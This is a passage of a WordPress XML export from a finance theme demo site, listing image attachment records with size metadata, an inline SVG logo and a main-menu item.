		<wp:post_id>2131</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:05:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:05:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart-values-home-5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/portfolio/digital-marketing/chart-values-home-5/</link>
		<pubDate>Tue, 17 Nov 2020 09:51:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2364</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 09:51:17]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 09:51:17]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart-values-home-5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>837</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart-values-home-5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/chart-values-home-5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:606;s:6:"height";i:342;s:4:"file";s:31:"2020/09/chart-values-home-5.png";s:5:"sizes";a:4:{s:6:"medium";a:4:{s:4:"file";s:31:"chart-values-home-5-300x169.png";s:5:"width";i:300;s:6:"height";i:169;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:31:"chart-values-home-5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:31:"chart-values-home-5-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:31:"chart-values-home-5-600x342.png";s:5:"width";i:600;s:6:"height";i:342;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>chart1-service-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/marketing-research/chart1-service-home5/</link>
		<pubDate>Tue, 17 Nov 2020 09:56:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2372</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 09:56:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 09:56:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[chart1-service-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/chart1-service-home5.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/chart1-service-home5.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:466;s:6:"height";i:296;s:4:"file";s:32:"2020/11/chart1-service-home5.png";s:5:"sizes";a:2:{s:6:"medium";a:4:{s:4:"file";s:32:"chart1-service-home5-300x191.png";s:5:"width";i:300;s:6:"height";i:191;s:9:"mime-type";s:9:"image/png";}s:9:"thumbnail";a:4:{s:4:"file";s:32:"chart1-service-home5-150x150.png";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>img-btn-pdf-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/marketing-research/img-btn-pdf-home5/</link>
		<pubDate>Tue, 17 Nov 2020 10:00:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2373</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 10:00:04]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 10:00:04]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[img-btn-pdf-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>898</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/img-btn-pdf-home5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:90;s:4:"file";s:29:"2020/11/img-btn-pdf-home5.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:28:"img-btn-pdf-home5-150x90.jpg";s:5:"width";i:150;s:6:"height";i:90;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>bannner-widget-home5</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/bannner-widget-home5/</link>
		<pubDate>Tue, 17 Nov 2020 10:15:38 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/bannner-widget-home5.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2416</wp:post_id>
		<wp:post_date><![CDATA[2020-11-17 10:15:38]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-17 10:15:38]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[bannner-widget-home5]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/bannner-widget-home5.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/11/bannner-widget-home5.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:270;s:6:"height";i:300;s:4:"file";s:32:"2020/11/bannner-widget-home5.jpg";s:5:"sizes";a:1:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"bannner-widget-home5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>favicon-aqua</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/favicon-aqua/</link>
		<pubDate>Wed, 02 Dec 2020 10:24:44 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/favicon-aqua.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2465</wp:post_id>
		<wp:post_date><![CDATA[2020-12-02 10:24:44]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-02 10:24:44]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[favicon-aqua]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/favicon-aqua.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/favicon-aqua.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:47;s:6:"height";i:47;s:4:"file";s:24:"2020/12/favicon-aqua.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>05_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/05_black/</link>
		<pubDate>Mon, 28 Dec 2020 07:34:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/05_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2577</wp:post_id>
		<wp:post_date><![CDATA[2020-12-28 07:34:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-28 07:34:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[05_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/05_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/05_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 22.0.1, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<svg version="1.1" id="Layer_3" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop  offset="4.025560e-07" style="stop-color:#CAF7F1"/>
	<stop  offset="1" style="stop-color:#74C7BC"/>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1
	s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0
	c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2
	c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4
	c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2
	c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4
	c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4
	c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1
	c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2
	c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2
	c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6
	c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7
	c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1
	c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5
	C40.4,20.6,40.4,20.5,40.4,20.3z"/>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5
		c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3
		c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1
		c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"/>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3
		c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2
		c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3
		c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"/>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19
		C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9
		c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z
		 M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7
		C88.8,5.7,89.1,5.5,89.5,5.5z"/>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1
		c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2
		c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7
		c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1
		c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5
		c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"/>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7
		c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"/>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"/>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7
		c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4
		c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8
		s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"/>
</g>
</svg>
]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>testi1</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/testi1/</link>
		<pubDate>Thu, 31 Dec 2020 11:25:52 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/testi1.png</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2580</wp:post_id>
		<wp:post_date><![CDATA[2020-12-31 11:25:52]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-31 11:25:52]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[testi1]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/testi1.png]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/12/testi1.png]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:90;s:6:"height";i:90;s:4:"file";s:18:"2020/12/testi1.png";s:5:"sizes";a:0:{}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/2106/</link>
		<pubDate>Fri, 13 Nov 2020 07:04:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-finance/2020/11/13/2106/</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>2106</wp:post_id>
		<wp:post_date><![CDATA[2020-11-13 07:04:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-11-13 07:04:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[2106]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>13</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[2102]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[604]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
